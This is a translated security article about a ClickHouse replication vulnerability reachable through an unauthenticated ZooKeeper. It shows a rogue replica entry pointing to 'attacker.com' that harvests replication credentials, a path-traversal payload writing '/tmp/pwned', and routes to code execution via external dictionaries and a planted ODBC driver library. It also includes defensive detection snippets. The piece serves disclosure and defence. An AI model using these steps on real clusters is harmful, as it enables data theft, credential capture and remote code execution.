This article tells the story of one very specific vulnerability in the ClickHouse replication protocol and also shows how the attack surface can be expanded.
ClickHouse is a database for storing large amounts of data, and most often more than one replica is used. Clustering and replication in ClickHouse are built on top of ZooKeeper (ZK).
The default ZK installation does not require authentication, so thousands of ZK servers used to configure Kafka, Hadoop, and ClickHouse are publicly accessible.
To reduce the attack surface, you should always configure authentication and authorization when installing ZooKeeper.
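As a minimal sketch of what such authorization might look like, the snippet below computes the identifier used by ZooKeeper's digest ACL scheme (the user name followed by the base64-encoded SHA-1 of `user:password`) and formats a `setAcl` command for the ZooKeeper CLI. The user name, password, and path are hypothetical placeholders, and the helper names are introduced here for illustration only.

```python
import base64
import hashlib


def zk_digest_id(username: str, password: str) -> str:
    """Build the 'user:base64(sha1(user:password))' id of the digest ACL scheme."""
    raw = f"{username}:{password}".encode("utf-8")
    digest = base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")
    return f"{username}:{digest}"


def set_acl_command(path: str, username: str, password: str) -> str:
    """Format a zkCli 'setAcl' line granting all permissions (cdrwa) to one user."""
    return f"setAcl {path} digest:{zk_digest_id(username, password)}:cdrwa"


if __name__ == "__main__":
    # Hypothetical credentials and path, for illustration only.
    print(set_acl_command("/clickhouse", "replicator", "change-me"))
```

An ACL of this kind only helps if every client, including the ClickHouse servers themselves, authenticates with the same credentials.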
There are, of course, Java deserialization vulnerabilities as well, but imagine that an attacker can read and write to the ZooKeeper used for ClickHouse replication.
When configured in cluster mode, ClickHouse supports distributed DDL queries, which are passed through ZK nodes created under /clickhouse/task_queue/ddl.
For example, you create a node /clickhouse/task_queue/ddl/query-0001 with content:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
and after that, the table xxx will be dropped on the servers host1 and host2 of the test cluster. Distributed DDL supports running CREATE/ALTER/DROP queries.
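To make the format of such a task node concrete, here is a small sketch that parses the three fields shown above and flags a DROP query. It assumes the node content looks exactly like the example (one `key: value` pair per line, with `hosts` written as a list literal); the function names are hypothetical and this is not ClickHouse's own parser.

```python
import ast


def parse_ddl_task(text: str) -> dict:
    """Parse the 'version / query / hosts' layout shown in the example above."""
    fields = {}
    for line in text.strip().splitlines():
        key, _, value = line.partition(": ")
        fields[key.strip()] = value.strip()
    # The hosts line is a quoted list, so a literal parser is enough here.
    fields["hosts"] = ast.literal_eval(fields["hosts"])
    return fields


def is_drop(task: dict) -> bool:
    """Flag tasks whose query starts with DROP."""
    return task["query"].lstrip().upper().startswith("DROP")


EXAMPLE = """version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']"""

if __name__ == "__main__":
    task = parse_ddl_task(EXAMPLE)
    print(task["hosts"], is_drop(task))
```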
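Sounds scary? But where can an attacker get the server addresses?
ClickHouse replication works at the level of individual tables, so each replica registers itself in ZK when a table is created. For example, when the following query is executed: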
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
the nodes columns and metadata will be created in ZK.
Content of /clickhouse/tables/01-01/foobar/replicas/chXX/host:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Is it possible to dump data from this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and authentication for replication is not configured. How can authentication be bypassed?
An attacker can create a new replica in ZK by simply copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.
Content of /clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
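From the defender's side, a rogue replica of this kind can be spotted by comparing the registered host values against the servers you actually run. The sketch below assumes the contents of each replica's host node have already been read from ZK into a dictionary; the function names and the allowlist are hypothetical.

```python
def parse_host_node(text: str) -> dict:
    """Parse the 'key: value' lines of a replica's host node."""
    return dict(line.split(": ", 1) for line in text.strip().splitlines())


def unexpected_replicas(replica_hosts: dict, allowed_hosts: set) -> list:
    """Return replica names whose registered host is not in the allowlist."""
    return sorted(
        name
        for name, content in replica_hosts.items()
        if parse_host_node(content)["host"] not in allowed_hosts
    )


# Node contents as they appear in the two listings above.
REPLICAS = {
    "chXX": "host: chXX-address\nport: 9009\ntcp_port: 9000\n"
            "database: default\ntable: foobar\nscheme: http",
    "attacker": "host: attacker.com\nport: 9009\ntcp_port: 9000\n"
                "database: default\ntable: foobar\nscheme: http",
}

if __name__ == "__main__":
    print(unexpected_replicas(REPLICAS, {"chXX-address"}))
```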
Then you need to tell the rest of the replicas that there is a new block of data on the attacker's server that they need to pick up. To do this, a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically increasing counter, which must be greater than the last one in the event log):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
where source replica is the name of the attacker's replica created in the previous step, block_id is the identifier of the data block, and get is the "get block" command.
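The structure of this log entry can be illustrated with a short parser. This is a sketch based only on the example above: it assumes the `key: value` lines come first and the last two lines are the command and the part name. Splitting the part name into partition, minimum block, maximum block, and level reflects the usual ClickHouse part naming as I understand it, so treat that breakdown as an assumption.

```python
def parse_log_entry(text: str) -> dict:
    """Split a replication log entry into its header fields, command and part."""
    entry, rest = {}, []
    for line in text.strip().splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            entry[key] = value
        else:
            rest.append(line)
    entry["command"], entry["part"] = rest
    return entry


def parse_part_name(part: str) -> dict:
    """Assumed layout: <partition>_<min_block>_<max_block>_<level>."""
    partition, min_block, max_block, level = part.rsplit("_", 3)
    return {
        "partition": partition,
        "min_block": int(min_block),
        "max_block": int(max_block),
        "level": int(level),
    }


EXAMPLE = """format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2"""

if __name__ == "__main__":
    entry = parse_log_entry(EXAMPLE)
    print(entry["source replica"], entry["command"], parse_part_name(entry["part"]))
```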
Next, each replica reads the new event in the log and contacts the server controlled by the attacker to fetch the data block (the replication protocol is binary and works over HTTP). The server attacker.com will receive requests like this:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
where XXX is the authentication data for replication. In some cases, this may be an account with access to the database via the main ClickHouse protocol and the HTTP protocol. As you can see, the attack surface becomes critically large because the ZooKeeper used for replication was left without authentication configured.
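To see what such a request carries, the request line can be taken apart with the standard URL parser. This is only an illustration of the query parameters visible in the example; the function and dictionary key names are hypothetical.

```python
from urllib.parse import parse_qs, urlsplit


def parse_fetch_request(request_line: str) -> dict:
    """Extract the endpoint, part name and compress flag from the request line."""
    method, target, _version = request_line.split(" ")
    params = parse_qs(urlsplit(target).query)
    # The endpoint value has the form '<kind>:<ZK path of the replica>'.
    kind, _, replica_path = params["endpoint"][0].partition(":")
    return {
        "method": method,
        "endpoint_kind": kind,
        "replica_path": replica_path,
        "part": params["part"][0],
        "compress": params["compress"][0] == "true",
    }


REQUEST_LINE = (
    "POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar"
    "/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1"
)

if __name__ == "__main__":
    print(parse_fetch_request(REQUEST_LINE))
```

Any Authorization value that reaches an untrusted host this way should be considered leaked and rotated.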
Let's look at the function that fetches a block of data from a replica. It is written with full confidence that all replicas are under proper control and that they trust each other.
(Figure: replication processing code)
The function reads a list of files, then their names, sizes, contents, and then writes them to the file system. It is worth separately describing how data is stored in the file system.
There are several subdirectories in /var/lib/clickhouse (the default storage directory from the config file):
flags - directory for storing flags;
tmp - directory for storing temporary files;
user_files - operations with files in queries are limited to this directory (INTO OUTFILE and others);
metadata - SQL files with table descriptions;
preprocessed_configs - processed derived configuration files from /etc/clickhouse-server;
data - the directory with the data itself; for each database, a separate subdirectory is simply created here (for example /var/lib/clickhouse/data/default).
For each table, a subdirectory is created in the database directory. Each column is stored in separate files; for the foobar table, for example:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
The replica expects to receive files with the same names when processing a data block and does not check them in any way.
The attentive reader has probably already noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, this allows the attacker to write arbitrary content to any file on the file system with the privileges of the clickhouse user. To do this, the replica controlled by the attacker must return the following response to the request (line breaks have been added for ease of understanding):
\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper
After the concatenation with ../../../../../../../../../tmp/pwned, the file /tmp/pwned will be written with the content hellofromzookeeper.
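The sketch below decodes the response bytes shown above and demonstrates the kind of check the receiving side was missing. The field layout is my reading of those bytes and should be treated as an assumption: an 8-byte little-endian file count, a variable-length integer with the name length (0x24 = 36), the name, an 8-byte little-endian file size (0x12 = 18), and the content. The part directory is a hypothetical example path, and the functions are not ClickHouse code.

```python
import posixpath
import struct


def read_varuint(buf: bytes, pos: int):
    """Read a little-endian base-128 varint; return (value, new position)."""
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def parse_part_response(buf: bytes) -> list:
    """Decode (file name, content) pairs under the assumed field layout."""
    (count,) = struct.unpack_from("<Q", buf, 0)
    pos, files = 8, []
    for _ in range(count):
        name_len, pos = read_varuint(buf, pos)
        name = buf[pos:pos + name_len].decode("utf-8")
        pos += name_len
        (size,) = struct.unpack_from("<Q", buf, pos)
        pos += 8
        files.append((name, buf[pos:pos + size]))
        pos += size
    return files


def escapes_directory(part_dir: str, file_name: str) -> bool:
    """True if joining file_name onto part_dir lands outside part_dir."""
    target = posixpath.normpath(posixpath.join(part_dir, file_name))
    return not target.startswith(part_dir.rstrip("/") + "/")


PAYLOAD = (
    b"\x01" + b"\x00" * 7 + b"\x24" + b"../" * 9 + b"tmp/pwned"
    + b"\x12" + b"\x00" * 7 + b"hellofromzookeeper"
)
# Hypothetical directory a fetched part might be written to.
PART_DIR = "/var/lib/clickhouse/data/default/foobar/tmp_fetch_all_0_0_2"

if __name__ == "__main__":
    for name, content in parse_part_response(PAYLOAD):
        print(name, content, escapes_directory(PART_DIR, name))
```

Rejecting any file name for which a check like `escapes_directory` returns true is one simple way to close this class of bug.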
There are several options for turning the ability to write files into remote code execution (RCE).
External Dictionaries to RCE
In older versions, the ClickHouse settings directory was owned by the clickhouse user by default. Settings files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs. When changes are made, they are reread. If write access to /etc/clickhouse-server is available,
the attacker can create his own external dictionary of the executable type and then run arbitrary code.
ODBC to RCE
When the package is installed, the user clickhouse is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the directory /nonexistent and give the clickhouse user write access to it (a self-inflicted problem; translator's note).
ClickHouse uses odbc-bridge for ODBC connections, so it is no longer possible to specify the path to the driver in the query. But can an attacker write to the home directory using the vulnerability described above?
Let's create a file ~/.odbc.ini with content like this:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
then, when the query SELECT * FROM odbc('DSN=lalala', 'test', 'test'); is run, the library test.so will be loaded, giving RCE.
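A quick way to audit for this situation is to look for DSN entries whose Driver points into a directory the clickhouse user can write to. The following is a rough sketch under that assumption; the list of writable directories is a hypothetical example and the function name is introduced here for illustration.

```python
import configparser


def risky_dsns(ini_text: str, writable_dirs: list) -> dict:
    """Return DSN sections whose Driver lives under a writable directory."""
    parser = configparser.ConfigParser()
    parser.read_string(ini_text)
    risky = {}
    for dsn in parser.sections():
        # Option names are case-insensitive in configparser.
        driver = parser.get(dsn, "Driver", fallback="")
        if any(driver.startswith(d.rstrip("/") + "/") for d in writable_dirs):
            risky[dsn] = driver
    return risky


ODBC_INI = """[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
"""

if __name__ == "__main__":
    # Hypothetical set of directories writable by the clickhouse user.
    print(risky_dsns(ODBC_INI, ["/var/lib/clickhouse", "/nonexistent"]))
```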
These and other vulnerabilities have been fixed in ClickHouse 19.14.3. Take care of your ClickHouse and ZooKeepers!
Source: habr.com